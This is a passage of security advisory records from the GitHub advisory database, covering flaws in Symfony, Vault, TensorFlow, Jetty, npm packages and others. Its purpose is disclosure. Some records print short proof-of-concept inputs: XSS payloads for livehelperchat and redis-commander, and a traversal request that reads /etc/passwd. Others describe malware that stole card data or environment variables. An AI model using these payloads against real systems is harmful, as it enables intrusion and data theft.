'https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E', 'https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG/', 'https://security.netapp.com/advisory/ntap-20200226-0002/', 'https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html', 'https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E', 'https://github.com/advisories/GHSA-c9hw-wf7x-jp9j', 'https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E'}
null
GHSA
GHSA-qw36-p97w-vcqr
Cookie persistence after password changes in symfony/security-bundle
Description ----------- Since the rework of the Remember me cookie in Symfony 5.3, the cookie is not invalidated anymore when the user changes its password. Attackers can therefore maintain their access to the account even if the password is changed as long as they have had the chance to login once and get a valid remember me cookie. Resolution ---------- Symfony now makes the password part of the signature by default. In that way, when the password changes then the cookie is not valid anymore. The patch for this issue is available [here](https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc) for branch 5.3. Credits ------- We would like to thank Thibaut Decherit for reporting the issue and Wouter J for fixing the issue.
{'CVE-2021-41268'}
2022-04-19T19:03:15Z
2021-11-24T20:05:22Z
MODERATE
6.5
{'CWE-384'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-41268', 'https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc', 'https://github.com/symfony/symfony/security/advisories/GHSA-qw36-p97w-vcqr', 'https://github.com/advisories/GHSA-qw36-p97w-vcqr', 'https://github.com/symfony/symfony/releases/tag/v5.3.12', 'https://github.com/symfony/symfony/pull/44243'}
null
GHSA
GHSA-fp52-qw33-mfmw
Authentication Bypass by Spoofing and Insufficient Verification of Data Authenticity in Hashicorp Vault
HashiCorp Vault and Vault Enterprise versions 0.7.1 and newer, when configured with the AWS IAM auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1..
{'CVE-2020-16250'}
2022-04-29T20:26:42Z
2021-08-02T17:11:41Z
CRITICAL
9.8
{'CWE-290', 'CWE-345'}
{'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#151', 'https://nvd.nist.gov/vuln/detail/CVE-2020-16250', 'https://github.com/advisories/GHSA-fp52-qw33-mfmw', 'http://packetstormsecurity.com/files/159478/Hashicorp-Vault-AWS-IAM-Integration-Authentication-Bypass.html', 'https://www.hashicorp.com/blog/category/vault/'}
null
GHSA
GHSA-83pq-466j-fc6j
Prototype Pollution in sahmat
All versions of `sahmat ` are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
null
2021-10-01T20:11:32Z
2020-09-04T15:17:50Z
HIGH
0
{'CWE-1321'}
{'https://www.npmjs.com/advisories/1336', 'https://github.com/advisories/GHSA-83pq-466j-fc6j'}
null
GHSA
GHSA-jh5x-hfhg-78jq
Deserialization of Untrusted Data in Archive_Tar
Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked. See: https://github.com/pear/Archive_Tar/issues/33
{'CVE-2020-28948'}
2022-04-01T18:11:12Z
2021-04-22T16:20:50Z
HIGH
7.8
{'CWE-502'}
{'https://lists.debian.org/debian-lts-announce/2020/11/msg00045.html', 'https://www.debian.org/security/2020/dsa-4817', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28948', 'https://github.com/pear/Archive_Tar/issues/33', 'https://security.gentoo.org/glsa/202101-23', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NBYZSHYTIOBK6V7C4N7TP6KIKCRKLVWP/', 'https://www.drupal.org/sa-core-2020-013', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJQQYDAOWHD6RDITDRPHFW7WY6BS3V5N/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4V35LBRM6HBCXBVCITKQ4UEBTXO2EG7B/', 'https://github.com/advisories/GHSA-jh5x-hfhg-78jq', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42GPGVVFTLJYAKRI75IVB5R45NYQGEUR/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/', 'https://github.com/pear/Archive_Tar/commit/0670a05fdab997036a3fc3ef113b8f5922e574da'}
null
GHSA
GHSA-5p3x-r448-pc62
Improper Verification of Cryptographic Signature in PySAML2
### Impact All users of pysaml2 that use the default `CryptoBackendXmlSec1` backend and need to verify signed SAML documents are impacted. `pysaml2 <= 6.4.1` does not ensure that a signed SAML document is correctly signed. The default `CryptoBackendXmlSec1` backend is using the `xmlsec1` binary to verify the signature of signed SAML documents, but by default, `xmlsec1` accepts any type of key found within the given document. `xmlsec1` needs to be configured explicitly to only use only _x509 certificates_ for the verification process of the SAML document signature. ### Patches Users should upgrade to pysaml2 `v6.5.0`. ### Workarounds No workaround provided at this point. ### References This issue has been reported in the past at the xmlsec1 mailing list: https://www.aleksey.com/pipermail/xmlsec/2013/009717.html ### Credits - Brian Wolff ### For more information If you have any questions or comments about this advisory: * Open an issue in [pysaml2](https://github.com/IdentityPython/pysaml2) * Email us at [the incident-response address](mailto:incident-response@idpy.org)
{'CVE-2021-21239'}
2021-03-01T18:55:05Z
2021-01-21T14:12:18Z
LOW
6.5
{'CWE-347'}
{'https://lists.debian.org/debian-lts-announce/2021/02/msg00038.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21239', 'https://pypi.org/project/pysaml2', 'https://github.com/IdentityPython/pysaml2/security/advisories/GHSA-5p3x-r448-pc62', 'https://github.com/advisories/GHSA-5p3x-r448-pc62', 'https://www.aleksey.com/pipermail/xmlsec/2013/009717.html', 'https://github.com/IdentityPython/pysaml2/releases/tag/v6.5.0', 'https://github.com/IdentityPython/pysaml2/commit/46578df0695269a16f1c94171f1429873f90ed99'}
null
GHSA
GHSA-j8jw-g6fq-mp7h
SQL injection in hibernate-core
"A flaw was found in hibernate-core in versions prior to and including 5.4.23.Final. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity."
{'CVE-2020-25638'}
2022-04-22T17:21:52Z
2022-02-09T22:57:29Z
HIGH
7.4
{'CWE-89'}
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://github.com/advisories/GHSA-j8jw-g6fq-mp7h', 'https://lists.debian.org/debian-lts-announce/2021/01/msg00000.html', 'https://lists.apache.org/thread.html/r833c1276e41334fa675848a08daf0c61f39009f9f9a400d9f7006d44@%3Cdev.turbine.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25638', 'https://bugzilla.redhat.com/show_bug.cgi?id=1881353', 'https://www.debian.org/security/2021/dsa-4908', 'https://lists.apache.org/thread.html/rf2378209c676a28b71f9b604a3b3517c448540b85367160e558ef9df@%3Ccommits.turbine.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
null
GHSA
GHSA-pjwm-rvh2-c87w
Embedded malware in ua-parser-js
The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-22T21:43:36Z
2021-10-22T20:38:14Z
CRITICAL
0
{'CWE-506'}
{'https://www.npmjs.com/package/ua-parser-js', 'https://github.com/advisories/GHSA-pjwm-rvh2-c87w', 'https://github.com/faisalman/ua-parser-js/issues/536', 'https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-949772496'}
null
GHSA
GHSA-xm7f-x4wx-wmgv
Out-of-bounds Read in byte
Versions of `byte` before 1.4.1 allocate uninitialized buffers and read data from them past the initialized length ## Recommendation Update to version 1.4.1 or later.
null
2021-08-04T20:47:21Z
2019-06-04T15:47:43Z
MODERATE
0
{'CWE-125'}
{'https://www.npmjs.com/advisories/657', 'https://github.com/node-modules/byte/pull/3', 'https://github.com/advisories/GHSA-xm7f-x4wx-wmgv', 'https://hackerone.com/reports/330351'}
null
GHSA
GHSA-957j-59c2-j692
Prototype pollution vulnerability in 'getobject'
Prototype pollution vulnerability in 'getobject' version 0.1.0 allows an attacker to cause a denial of service and may lead to remote code execution.
{'CVE-2020-28282'}
2021-10-12T16:26:37Z
2021-10-12T16:26:37Z
CRITICAL
9.8
null
{'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28282', 'https://github.com/advisories/GHSA-957j-59c2-j692', 'https://github.com/cowboy/node-getobject/blob/aba04a8e1d6180eb39eff09990c3a43886ba8937/lib/getobject.js#L48', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28282'}
null
GHSA
GHSA-8wcc-f2vq-h4gx
Cross-site Scripting in livehelperchat
Stored XSS is found in Settings>Live help configuration>Personal Theme>static content. Under the NAME field put a payload {{constructor.constructor('alert(1)')()}} while creating content, and you will see that the input gets stored, and every time the user visits, the payload gets executed.
{'CVE-2022-0370'}
2022-02-03T20:34:04Z
2022-01-28T23:06:22Z
MODERATE
5.4
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0370', 'https://github.com/livehelperchat/livehelperchat/commit/9f5bc33c943349bd765b991db0b7f6b6ef05cfdb', 'https://huntr.dev/bounties/fbe4b376-57ce-42cd-a9a9-049c4099b3ca', 'https://github.com/advisories/GHSA-8wcc-f2vq-h4gx'}
null
GHSA
GHSA-w47j-hqpf-qw9w
Out of bounds read in lazy-init
An issue was discovered in the lazy-init crate through 2021-01-17 for Rust. Lazy lacks a Send bound, leading to a data race.
{'CVE-2021-25901'}
2021-08-25T20:52:59Z
2021-08-25T20:52:59Z
MODERATE
5.3
{'CWE-125'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-25901', 'https://github.com/advisories/GHSA-w47j-hqpf-qw9w', 'https://rustsec.org/advisories/RUSTSEC-2021-0004.html', 'https://github.com/khuey/lazy-init/issues/9'}
null
GHSA
GHSA-9fg5-f5pj-rwcc
Hijacked Environment Variables in gruntcli
The `gruntcli` package is a piece of malware that steals environment variables and sends them to attacker controlled locations. All versions have been unpublished from the npm registry. ## Recommendation As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there. If you have found this installed in your environment, you should: 1. Delete the package 2. Clear your npm cache 3. Ensure it is not present in any other package.json files on your system 4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables. Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.
{'CVE-2017-16058'}
2021-01-08T19:04:59Z
2018-11-09T17:43:52Z
MODERATE
0
{'CWE-506'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16058', 'https://nodesecurity.io/advisories/498', 'https://github.com/advisories/GHSA-9fg5-f5pj-rwcc', 'https://www.npmjs.com/advisories/498'}
null
GHSA
GHSA-x3rh-m7vp-35f2
Operation on a Resource after Expiration or Release in Jetty Server
In Eclipse Jetty, versions 9.4.27.v20200227 to 9.4.29.v20200521, in case of too large response headers, Jetty throws an exception to produce an HTTP 431 error. When this happens, the ByteBuffer containing the HTTP response headers is released back to the ByteBufferPool twice. Because of this double release, two threads can acquire the same ByteBuffer from the pool and while thread1 is about to use the ByteBuffer to write response1 data, thread2 fills the ByteBuffer with response2 data. Thread1 then proceeds to write the buffer that now contains response2 data. This results in client1, which issued request1 and expects responses, to see response2 which could contain sensitive data belonging to client2 (HTTP session ids, authentication credentials, etc.).
{'CVE-2019-17638'}
2021-06-15T18:11:20Z
2020-08-05T14:52:59Z
CRITICAL
9.4
{'CWE-675', 'CWE-672'}
{'https://github.com/eclipse/jetty.project/issues/4936', 'https://lists.apache.org/thread.html/r7fc5f2ed49641ea91c433e3cd0fc3d31c0278c87b82b15c33b881415@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/ra8661fc8c69c647cb06153c1485d48484a833d873f75dfe45937e9de@%3Ccommits.pulsar.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/r81f58591fb4716fb867b36956f30c7c8ad4ab3f23abc952d9d86a2a0@%3Ccommits.pulsar.apache.org%3E', 'https://snyk.io/vuln/SNYK-JAVA-ORGECLIPSEJETTY-575561', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r521168299e023fb075b57afe33d17ff1d09e8a10e0fd8c775ea0e028@%3Ccommits.pulsar.apache.org%3E', 'https://github.com/eclipse/jetty.project/commit/ff8ae56fa939c3477a0cdd1ff56ce3d902f08fba', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XE6US6VPZHOWFMUSFGDS5V2DNQPY5MKB/', 'https://github.com/advisories/GHSA-x3rh-m7vp-35f2', 'https://lists.apache.org/thread.html/rd98cfd012490cb02caa1a11aaa0cc38bff2d43bcce9b20c2f01063dd@%3Ccommits.pulsar.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17638', 'https://lists.apache.org/thread.html/rbe1f230e87ea947593145d0072d0097ddb0af10fee1161db8ca1546c@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r29073905dc9139d0d7a146595694bf57bb9e35e5ec6aa73eb9c8443a@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r9584c4304c888f651d214341a939bd264ed30c9e3d0d30fe85097ecf@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r378e4cdec15e132575aa1dcb6296ffeff2a896745a8991522e266ad4@%3Ccommits.pulsar.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2020/08/17/1', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=564984', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r4bdd3f7bb6820a79f9416b6667d718a06d269018619a75ce4b759318@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r9a2cfa56d30782a0c17a5deb951a622d1f5c8de48e1c3b578ffc2a84@%3Ccommits.pulsar.apache.org%3E'}
null
GHSA
GHSA-57v4-m9jx-mh8r
Improper Input Validation
A vulnerability was found in OVN Kubernetes in versions up to and including 0.3.0 where the Egress Firewall does not reliably apply firewall rules when there is multiple DNS rules. It could lead to potentially lose of confidentiality, integrity or availability of a service.
{'CVE-2021-3499'}
2022-03-15T21:36:54Z
2021-06-08T23:05:19Z
MODERATE
5.6
{'CWE-863'}
{'https://github.com/ovn-org/ovn-kubernetes/pull/2169', 'https://bugzilla.redhat.com/show_bug.cgi?id=1949188', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3499', 'https://github.com/advisories/GHSA-57v4-m9jx-mh8r'}
null
GHSA
GHSA-pg59-2f92-5cph
Heap buffer overflow in Tensorflow
### Impact The `SparseCountSparseOutput` and `RaggedCountSparseOutput` implementations don't validate that the `weights` tensor has the same shape as the data. The check exists for `DenseCountSparseOutput`, where both tensors are fully specified: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L110-L117 In the sparse and ragged count weights are still accessed in parallel with the data: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L199-L201 But, since there is no validation, a user passing fewer weights than the values for the tensors can generate a read from outside the bounds of the heap buffer allocated for the weights. ### Patches We have patched the issue in 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and will release a patch release. We recommend users to upgrade to TensorFlow 2.3.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability is a variant of [GHSA-p5f8-gfw5-33w4](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p5f8-gfw5-33w4)
{'CVE-2020-15196'}
2021-11-19T15:20:13Z
2020-09-25T18:28:21Z
HIGH
8.5
{'CWE-119', 'CWE-122', 'CWE-125'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-15196', 'https://github.com/advisories/GHSA-pg59-2f92-5cph', 'https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-pg59-2f92-5cph', 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}
null
GHSA
GHSA-5p9j-w2wx-qx4c
Open Redirect in django-spirit
django-spirit prior to version 0.12.3 is vulnerable to open redirect. In the /user/login endpoint, it doesn't check the value of the next parameter when the user is logged in and passes it directly to redirect which result to open redirect. This also affects /user/logout, /user/register, /user/login, /user/resend-activation.
{'CVE-2022-0869'}
2022-03-14T21:19:29Z
2022-03-07T00:00:40Z
MODERATE
6.1
{'CWE-601'}
{'https://github.com/nitely/spirit/commit/8f32f89654d6c30d56e0dd167059d32146fb32ef', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0869', 'https://github.com/advisories/GHSA-5p9j-w2wx-qx4c', 'https://huntr.dev/bounties/ed335a88-f68c-4e4d-ac85-f29a51b03342'}
null
GHSA
GHSA-v99v-xgjx-7m7g
Malicious Package in asnyc
All versions of `asnyc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise. ## Recommendation Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
null
2021-10-01T14:00:56Z
2020-09-02T18:40:47Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-v99v-xgjx-7m7g', 'https://www.npmjs.com/advisories/847'}
null
GHSA
GHSA-72cx-5ff9-4hhc
Cross-site scripting in markdown2 for python
python-markdown2 before 1.0.1.14 has multiple cross-site scripting (XSS) issues.
{'CVE-2009-3724'}
2022-04-26T20:29:03Z
2022-04-21T01:54:03Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/advisories/GHSA-72cx-5ff9-4hhc', 'https://www.openwall.com/lists/oss-security/2009/10/29/5', 'https://nvd.nist.gov/vuln/detail/CVE-2009-3724'}
null
GHSA
GHSA-6h7w-fc84-x7p6
StaticFile.fromUrl can leak presence of a directory
### Impact `StaticFile.fromUrl` can leak the presence of a directory on a server when the `URL` scheme is not `file://`, and the URL points to a fetchable resource under its scheme and authority. The function returns `F[None]`, indicating no resource, if `url.getFile` is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL would return a stream, and the path in the URL exists as a directory on the server, the presence of the directory on the server could be inferred from the 404 response. The contents and other metadata about the directory are not exposed. This affects http4s versions: * 0.21.7 through 0.21.23 * 0.22.0-M1 through 0.22.0-M8 * 0.23.0-M1 * 1.0.0-M1 through 1.0.0-M22 ### Patches The [patch](https://github.com/http4s/http4s/commit/52e1890665410b4385e37b96bc49c5e3c708e4e9) is available in the following versions: * v0.21.24 * v0.22.0-RC1 * v0.23.0-RC1 * v1.0.0-M23 Note: a previous version of this advisory incorrectly referred to 0.22.0-M9 and 0.23.0-M2. ### Workarounds Don't call `StaticFile.fromUrl` with non-file URLs. ### For more information If you have any questions or comments about this advisory: * Open an issue in [the http4s repository](https://github.com/http4s/http4s) * Disclose further vulnerabilities according to the [http4s security policy](https://github.com/http4s/http4s/blob/main/SECURITY.md)
{'CVE-2021-32643'}
2021-05-28T15:54:39Z
2021-05-28T15:54:39Z
MODERATE
5.8
{'CWE-22'}
{'https://mvnrepository.com/artifact/org.http4s/http4s-core', 'https://github.com/http4s/http4s/commit/52e1890665410b4385e37b96bc49c5e3c708e4e9', 'https://github.com/advisories/GHSA-6h7w-fc84-x7p6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32643', 'https://github.com/http4s/http4s/security/advisories/GHSA-6h7w-fc84-x7p6'}
null
GHSA
GHSA-8xj3-7258-w4q2
Directory Traversal in dasafio
Affected versions of `dasafio` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16179'}
2021-01-14T15:38:57Z
2020-09-01T18:51:22Z
MODERATE
0
{'CWE-22'}
{'https://github.com/advisories/GHSA-8xj3-7258-w4q2', 'https://nodesecurity.io/advisories/460', 'https://www.npmjs.com/advisories/460', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dasafio', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16179'}
null
GHSA
GHSA-h96w-mmrf-2h6v
Improper Input Validation in Twisted
In Twisted Web through 20.3.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.
{'CVE-2020-10108'}
2022-04-04T21:10:30Z
2020-03-31T15:42:42Z
CRITICAL
9.8
{'CWE-20', 'CWE-444'}
{'https://usn.ubuntu.com/4308-1/', 'https://usn.ubuntu.com/4308-2/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10108', 'https://security.gentoo.org/glsa/202007-24', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/', 'https://know.bishopfox.com/advisories/twisted-version-19.10.0', 'https://github.com/advisories/GHSA-h96w-mmrf-2h6v', 'https://github.com/twisted/twisted/blob/6ff2c40e42416c83203422ff70dfc49d2681c8e2/NEWS.rst#twisted-2030-2020-03-13', 'https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/'}
null
GHSA
GHSA-p9gf-gmfv-398m
Double free in slice_deque
An issue was discovered in the slice-deque crate through 2021-02-19 for Rust. A double drop can occur in SliceDeque::drain_filter upon a panic in a predicate function.
{'CVE-2021-29938'}
2021-08-25T20:54:16Z
2021-08-25T20:54:16Z
HIGH
7.5
{'CWE-415'}
{'https://github.com/advisories/GHSA-p9gf-gmfv-398m', 'https://github.com/gnzlbg/slice_deque/issues/90', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29938', 'https://rustsec.org/advisories/RUSTSEC-2021-0047.html'}
null
GHSA
GHSA-8c8c-4vfj-rrpc
Reflected Cross-Site Scripting in redis-commander
Affected versions of `redis-commander` contain a cross-site scripting vulnerability in the `highlighterId` paramter of the clipboard.swf component on hosts serving Redis Commander. Mitigating factors: Flash must be installed / enabled for this to work. The below proof of concept was verified to work using Firefox 57.0 on Windows 10 by manually installing the [Flash NPAPI Windows plugin](https://get.adobe.com/flashplayer/otherversions/) ## Proof of concept ``` http://instance/jstree/_docs/syntax/clipboard.swf?highlighterId=\%22))}%20catch(e)%20{alert(document.domain);}// ``` ## Recommendation No direct patch for this vulnerability is currently available. At this time, the best mitigation is to use an alternative, functionally equivalent package, or to use extreme caution when using redis-commander, ensuring that redis-commmander is the only web page you have open, and avoiding clicking on any links.
null
2022-04-19T19:03:26Z
2020-09-01T19:05:11Z
LOW
0
{'CWE-79'}
{'https://hackerone.com/reports/296377', 'https://github.com/advisories/GHSA-8c8c-4vfj-rrpc', 'https://github.com/joeferner/redis-commander/commit/1a483ebb3a706cf199dd283cf0aead96606adb14', 'https://www.npmjs.com/advisories/562', 'https://github.com/joeferner/redis-commander/releases/tag/v0.5.0'}
null
GHSA
GHSA-w6j8-jc36-x5q9
Improper Neutralization of Text-Values in Object Version Preview
Text-values were not properly escaped before printed in the version preview. This allowed XSS by authenticated users with access to the resources.
{'CVE-2021-39166'}
2021-09-02T18:54:55Z
2021-09-01T18:22:09Z
HIGH
8
{'CWE-79'}
{'https://github.com/pimcore/pimcore/security/advisories/GHSA-w6j8-jc36-x5q9', 'https://github.com/pimcore/pimcore/pull/10170', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39166', 'https://github.com/advisories/GHSA-w6j8-jc36-x5q9'}
null
GHSA
GHSA-4943-9vgg-gr5r
Cross-site Scripting in quill
A vulnerability in the HTML editor of Slab Quill allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted `onloadstart` attribute of an IMG element) in a text field. No patch exists and no further releases are planned. This CVE is disputed. Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser. More information can be found [here](https://github.com/quilljs/quill/issues/3364).
{'CVE-2021-3163'}
2022-03-22T15:00:37Z
2021-05-10T15:38:12Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/advisories/GHSA-4943-9vgg-gr5r', 'https://burninatorsec.blogspot.com/2021/04/cve-2021-3163-xss-slab-quill-js.html', 'https://github.com/quilljs/quill/issues/3364', 'https://quilljs.com', 'https://github.com/quilljs/quill/issues/3273', 'https://github.com/quilljs/quill/issues/3359', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3163'}
null
GHSA
GHSA-j5qg-46p9-w2rp
Malicious Package in jekyll-for-github-projects
Version 0.2.12 of `jekyll-for-github-projects` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=` ## Recommendation Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
null
2020-09-03T00:33:32Z
2020-09-03T00:33:32Z
CRITICAL
0
null
{'https://www.npmjs.com/advisories/936', 'https://github.com/advisories/GHSA-j5qg-46p9-w2rp'}
null
GHSA
GHSA-c697-r227-pq6h
Unrestricted Upload of File with Dangerous Type in pimcore
Unrestricted Upload of File with Dangerous Type in Packagist pimcore/pimcore
{'CVE-2022-0263'}
2022-01-25T20:47:42Z
2022-01-21T23:33:58Z
HIGH
7.8
{'CWE-434'}
{'https://github.com/pimcore/pimcore/commit/35d1853baf64d6a1d90fd8803e52439da53a3911', 'https://github.com/advisories/GHSA-c697-r227-pq6h', 'https://huntr.dev/bounties/96506857-06bc-4c84-88b7-4f397715bcf6', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0263'}
null
GHSA
GHSA-4fx9-vc88-q2xc
Infinite loop in Pillow
JpegImagePlugin may append an EOF marker to the end of a truncated file, so that the last segment of the data will still be processed by the decoder. If the EOF marker is not detected as such however, this could lead to an infinite loop where JpegImagePlugin keeps trying to end the file.
null
2022-03-11T23:39:41Z
2022-03-11T23:39:27Z
LOW
0
{'CWE-400'}
{'https://github.com/advisories/GHSA-4fx9-vc88-q2xc', 'https://github.com/python-pillow/Pillow/commit/baae9ec4b67c68e3adaf1208cf54e8de5e38a6fd', 'https://pillow.readthedocs.io/en/stable/releasenotes/9.0.0.html#ensure-jpegimageplugin-stops-at-the-end-of-a-truncated-file'}
null
GHSA
GHSA-23gj-368h-92pq
Path Traversal in DKPro Core
core/api/datasets/internal/actions/Explode.java in the Dataset API in DKPro Core through 1.10.0 allows Directory Traversal, resulting in the overwrite of local files with the contents of an archive.
{'CVE-2019-11082'}
2021-08-04T15:17:12Z
2019-05-29T18:05:11Z
HIGH
7.5
{'CWE-22'}
{'https://github.com/advisories/GHSA-23gj-368h-92pq', 'https://github.com/dkpro/dkpro-core/issues/1325', 'https://nvd.nist.gov/vuln/detail/CVE-2019-11082'}
null
GHSA
GHSA-cff7-6h4q-q5pj
Lacked element count during splitting of JWE string
The json-jwt gem before 1.11.0 for Ruby lacks an element count during the splitting of a JWE string.
{'CVE-2019-18848'}
2022-05-04T01:52:59Z
2019-11-14T15:25:51Z
HIGH
7.5
{'CWE-287', 'CWE-20'}
